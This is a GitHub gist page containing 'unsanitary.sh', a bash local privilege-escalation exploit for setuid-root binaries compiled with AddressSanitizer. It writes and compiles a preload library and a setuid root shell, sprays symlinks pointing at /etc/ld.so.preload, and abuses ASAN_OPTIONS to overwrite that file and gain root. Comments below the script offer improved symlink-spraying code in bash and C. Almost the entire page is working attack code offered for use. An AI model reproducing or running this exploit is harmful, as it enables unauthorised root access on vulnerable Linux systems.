Last active
April 30, 2021 03:36
-
-
Save 0x27/9ff2c8fb445b6ab9c94e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# unsanitary.sh - ASAN/SUID Local Root Exploit | |
# Exploits er, unsanitized env var passing in ASAN | |
# which leads to file clobbering as root when executing | |
# setuid root binaries compiled with ASAN. | |
# Uses an overwrite of /etc/ld.so.preload to get root on | |
# a vulnerable system. Supply your own target binary to | |
# use for exploitation. | |
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363 | |
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk | |
# Released under the Snitches Get Stitches Public Licence. | |
# Gr33tz to everyone in #lizardhq and elsewhere <3 | |
# ~infodox (18/02/2016) | |
# FREE LAURI LOVE! | |
echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)" | |
if [[ $# -eq 0 ]] ; then | |
echo "use: $0 /full/path/to/targetbin" | |
echo "where targetbin is setuid root and compiled w/ ASAN" | |
exit 0 | |
fi | |
echo "[+] First, we create our shell and library..." | |
cat << EOF > /tmp/libhax.c | |
#include <stdio.h> | |
#include <sys/types.h> | |
#include <unistd.h> | |
__attribute__ ((__constructor__)) | |
void dropshell(void){ | |
chown("/tmp/rootshell", 0, 0); | |
chmod("/tmp/rootshell", 04755); | |
unlink("/etc/ld.so.preload"); | |
printf("[+] done!\n"); | |
} | |
EOF | |
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c | |
rm -f /tmp/libhax.c | |
cat << EOF > /tmp/rootshell.c | |
#include <stdio.h> | |
int main(void){ | |
setuid(0); | |
setgid(0); | |
seteuid(0); | |
setegid(0); | |
execvp("/bin/sh", NULL, NULL); | |
} | |
EOF | |
gcc -o /tmp/rootshell /tmp/rootshell.c | |
rm -f /tmp/rootshell.c | |
echo "[+] Now we drop our python symlink spraying tool..." | |
cat << EOF > sym.py | |
#!/usr/bin/python | |
import os | |
curpid=os.getpid() | |
print curpid | |
for x in range(0,100): | |
newpid=curpid+x | |
boom = "foo.%s" %(str(newpid)) | |
os.symlink("/etc/ld.so.preload", boom) | |
EOF | |
echo "[+] Spraying dir with symlinks..." | |
python sym.py | |
echo "[+] Hack the planet!" | |
ASAN_OPTIONS='suppressions="/hacktheplanet | |
/tmp/libhax.so | |
hacktheplanet" log_path=./foo verbosity=1' $1 >/dev/null 2>&1 | |
$1 >/dev/null 2>&1 | |
echo "[+] Tidy up a bit..." | |
rm -f foo* | |
rm -f sym.py | |
rm -f /tmp/libhax.so | |
echo "[<3] :PPpPpPpOpr000000t!" | |
/tmp/rootshell |
sym.py is not needed...
in bash $$ is equal to the pid of the current shells process
so with that, lines 49 through 60 can be simplified to something such as
echo $$
for i in {1..100}; do ln -s /etc/ld.so.preload "foo.$(($$+$i))";done
Unfortunately it's not that simple, as each invocation of ln
will spawn a new process, offsetting the pid by 1
.
I've written an updated version of 0x27's exploit here, which replaces the python code with a simple C implementation, removing the requirement for python
to be installed.
Here's the relevant code:
spray="/tmp/.spray"
# ...
log_prefix="$(cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 12 | head -n 1)___"
spray_size=100
# ...
echo "[.] Compiling ${spray}.c ..."
cat << EOF > "${spray}.c"
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
pid_t pid = getpid();
char buf[64];
for (int i=0; i<=${spray_size}; i++) {
snprintf(buf, sizeof(buf), "${log_prefix}.%ld", (long)pid+i);
symlink("/etc/ld.so.preload", buf);
}
}
EOF
if ! gcc "${spray}.c" -o "${spray}"; then
echo "[-] Compiling ${spray}.c failed"
exit 1
fi
/bin/rm -f "${spray}.c"
echo "[.] Spraying $(pwd) with symlinks ..."
/bin/rm $log_prefix* >/dev/null 2>&1
$spray
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
sym.py is not needed...
in bash $$ is equal to the pid of the current shells process
so with that, lines 49 through 60 can be simplified to something such as
echo $$
for i in {1..100}; do ln -s /etc/ld.so.preload "foo.$(($$+$i))";done